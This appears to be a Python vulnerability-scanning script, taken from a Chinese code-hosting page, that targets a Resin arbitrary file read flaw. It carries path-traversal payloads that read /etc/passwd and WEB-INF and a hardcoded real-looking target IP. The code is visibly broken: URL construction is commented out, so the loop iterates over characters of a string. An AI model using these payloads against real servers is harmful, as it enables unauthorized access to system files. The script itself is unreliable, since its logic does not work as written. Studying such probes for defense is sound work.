代码拉取完成,页面将自动刷新
# -*- coding:utf-8 -*-
"""
Resin远程任意文件读取漏洞
"""
#引入依赖库、包文件
import os
import sys
import urllib
import logging
import requests
#设置全局配置
logging.basicConfig(format="%(message)s",level=logging.INFO)
#定义全局变量和全局函数
payload1 = "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"
payload2 = "/resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../../../../etc/passwd"
payload3 = "/ ..\\\\web-inf"
payloadList = [payload1,payload2,payload3]
# def getUrl(url):
# urList = []
# if url != None and isinstance(url,str):
# if url.find(":") >= 3:
# protocol = url.split(":")[0]+"://"
# hostname = url.split(":")[1].split("/")[2]
# for payload in payloadList:
# tUrl = protocol + hostname + payload
# urList.append(tUrl)
# enUrl = urllib.parse.quote(tUrl)
# urList.append(enUrl)
# else:
# pass
# return urList
class ResinScan:
def __init__(self,url):
self.tUrList = url
self.flag = ["root:x:0:0:root:/root","<h1>Directory of"]
def scan(self):
for url in self.tUrList:
try:
response = requests.get(url,timeout=3,verify=False)
for string in self.flag:
if response.content.find(string) >= 0:
return True
except Exception:
logging.info("[-] 扫描错误--错误原因:%s"%str(Exception))
return False
if __name__ == "__main__":
# try:
# url = sys.argv[1]
# except Exception:
# logging.info("[-] 没有找到目标站点")
# exit(0)
url = "http://111.160.6.90:10000"
scan = ResinScan(url)
if scan.scan():
logging.info("[+] 发现漏洞!")
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。